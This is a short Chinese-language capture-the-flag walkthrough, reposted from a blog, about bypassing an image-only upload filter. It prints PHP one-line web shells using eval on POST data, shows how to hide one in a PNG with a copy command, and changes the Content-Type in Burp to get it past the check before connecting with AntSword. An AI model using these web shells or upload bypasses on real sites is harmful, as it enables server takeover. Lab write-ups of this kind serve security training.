?PHP一句話木馬
<?php @eval($_POST["pass"]);?>
<?php eval($_REQUEST["pass"]);?>
詳情可瀏覽:Web安全-一句話木馬
?制作圖片馬
1)copy命令
copy 1.png/b+1.php/a pic.php
!!!不要使用powershell 請使用cmd
//powershell中copy命令應該命令引數不一樣 導致各種報錯
2)文本編輯器/十六進制編輯器
用文本編輯器/十六進制編輯器打開圖片在末尾添加一句話木馬
然后保存為xxx.php
//經過測驗后續也可以蟻劍連接 和copy命令比較只是檔案末尾少了個1A(檔案結束符)
知識擴展:ASCII碼0x1A使檔案意外結束的處理方法
?Burp改包
Burp開啟proxy后對檔案上傳submit抓包
然后修改Content-Type為image/png
!注意修改位置
//靶場環境只允許PNG、JPG、GIF格式檔案上傳 改包繞過
?蟻劍連接
獲得flag
結束,
?圖片馬注意點
開始遇到問題蟻劍一直連接失敗
后來選用了較為簡單的圖片制作圖片馬蟻劍就連接成功了
制作圖片馬的圖片一定要簡單 越簡單越好
比如下面這樣的
?轉載請注明出處
本文作者:雙份濃縮馥芮白
原文鏈接:https://www.cnblogs.com/Flat-White/p/13673112.html
著作權所有,如需轉載請注明出處,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/48281.html
標籤:其他